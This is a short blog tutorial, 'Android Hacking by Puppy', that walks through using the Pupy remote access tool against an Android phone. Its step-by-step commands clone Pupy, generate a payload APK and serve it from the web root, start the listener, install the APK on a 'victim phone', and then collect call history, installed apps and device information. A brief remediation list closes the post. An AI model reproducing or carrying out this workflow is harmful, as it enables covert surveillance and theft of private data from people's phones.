Android Hacking by Puppy
Pupy is a cross-platform, multi function RAT and post-exploitation tool .It can communicate using multiple transports, migrate into processes using reflective injection, and load remote python code, python packages and python C-extensions from memory.Machine Used : Kali Linux
IP used (Pvt) : 192.168.3.234
Step 1:
Perform the below commands in the Linux
CMD # apt-get updateCMD # apt-get upgrade
CMD # git clone https://github.com/n1nj4sec/pupy.git
CMD # service apache2 start
CMD # service apache2 status
Step 2:
Run the following command to generate apk with payloadCMD # . /pupygen.py -O android -o /var/www/html/kashy.apk
Step 3:
Now navigate to pupy folder and Start pupysh.pyCMD # ./pupysh.py
Step 4:
Install the apk into the victim phone
Step 5:
Now back to kali Linux and perform “help” command to display all commands which we can use. as shown in the below images.
Step 6:
Now are extracting the call history of an mobile .Type “call –a –output-folder /root/c” to collect call history to folder c in root directory
CMD # call –a –output-folder /root/c
Step 7:
Type “apps –a –d” to list all installed applications in the Victim mobileCMD # apps –a –d
Step 8:
Type “get_info” to display Victim Mobile info && “ls” to list foldersCMD # get_info
CMD # ls
Remediation’s :-
- Do not install any 3rd party apps into mobile without knowing anything
- Use anti-virus software’s
- Enable play protection & disable install apps from unknown sources
- Keep system up-to-date
Ref : https://github.com/n1nj4sec/pupy
Author: A KashYap.
Website: https://kashy1712.blogspot.com/
No comments:
Post a Comment